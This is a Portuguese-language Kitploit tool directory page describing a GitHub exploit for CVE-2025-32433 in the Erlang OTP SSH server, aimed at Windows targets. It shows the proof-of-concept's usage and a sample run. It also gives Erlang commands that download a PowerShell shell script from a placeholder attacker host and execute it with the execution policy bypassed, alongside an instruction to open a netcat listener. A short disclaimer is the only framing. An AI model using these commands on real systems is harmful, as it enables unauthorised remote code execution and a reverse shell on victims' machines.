Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32433-available-for-windows — CVE-2025-32433-available-for-windows-victims | Kitploit
Ferramentas/GitHubGitHub/blackcat4347/cve-2025-32433-available-for-windows
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoComando e ControleAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubblackcat4347/cve-2025-32433-available-for-windows

CVE-2025-32433-available-for-windows

CVE-2025-32433-available-for-windows-victims

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
3há 7 mesesAinda não revisado
Compartilhar

CVE-2025-32433

Informações sobre a vulnerabilidade: https://nvd.nist.gov/vuln/detail/CVE-2025-32433

POC

root@kitploit:~
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433.py -h
usage: cve-2025-32433.py [-h] [-d] [--host HOST] [--port PORT]

Exploit for CVE-2025-32433 (Erlang OTP SSH server).

options:
  -h, --help           show this help message and exit
  -d, --debug          Print raw response in hex format
  -t, --target TARGET  Target host (default: 127.0.0.1)
  -p, --port PORT      Target port (default: 2222)
  
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433.py -t 127.0.0.1 -p 2222
[*] Connecting to SSH server...
[✓] Banner: SSH-2.0-Erlang/5.1.4.7
[*] Sending KEXINIT...
[*] Opening channel...
[?] Shell command: your command
[*] Sending CHANNEL_REQUEST...
[✓] Payload sent.

obter o payload

root@kitploit:~
inets:start(), {ok, {_, _, Body}} = httpc:request("http://ip_attack/shell.ps1"), file:write_file("C:/Users/Public/shell.ps1", Body).

Crie uma sessão de listener netcat e execute o comando.

root@kitploit:~
os:cmd("powershell.exe -ExecutionPolicy Bypass -File C:/Users/Public/shell.ps1").

Aviso legal

Esta ferramenta destina-se apenas a fins educacionais e a testes de segurança autorizados. O autor não é responsável por qualquer uso indevido ou dano causado por este script.

Baixar ferramenta